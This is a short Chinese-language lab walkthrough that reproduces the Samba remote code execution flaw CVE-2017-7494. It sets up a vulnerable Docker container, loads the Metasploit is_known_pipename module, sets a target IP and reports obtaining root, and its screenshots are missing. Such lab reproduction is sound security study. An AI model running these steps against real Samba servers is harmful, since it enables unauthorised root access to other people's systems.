Msf复现Samba远程代码执行漏洞
5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞,漏洞编号CVE-2017-7494,漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。
实验环境
1.使用docker搭建(linux_samba)
docker run -d -p 445:445 -p 139:139 -p 138:138 -p 137:137 medicean/vulapps:s_samba_1下载完成后,让我们确认是否已经成功开启了docker-samba:
![]()
2.Exploit_CVE-2017-7494(msf-ruby)
CVE-2017-7494下载:https://github.com/hdm/metasploit-framework/blob/0520d7cf76f8e5e654cb60f157772200c1b9e230/modules/exploits/linux/samba/is_known_pipename.rb
并将该ruby脚本拷贝至kali的/usr/share/metasploit-framework/modules/exploits/linux/samba/目录下:
启动msfconsole,并选择使用is_known_pipename模块:
msf > use exploit/linux/samba/is_known_pipename![]()
使用options选项,查看我们需要设置的参数:![]()
可以看到我们只需设置目标ip即可。
设置目标靶机ip:
set RHOST 192.168.1.102exploit:
验证漏洞是否成功利用:
![]()
可以看到,我们已经成功获取到了目标的root权限。
视频演示:
congtou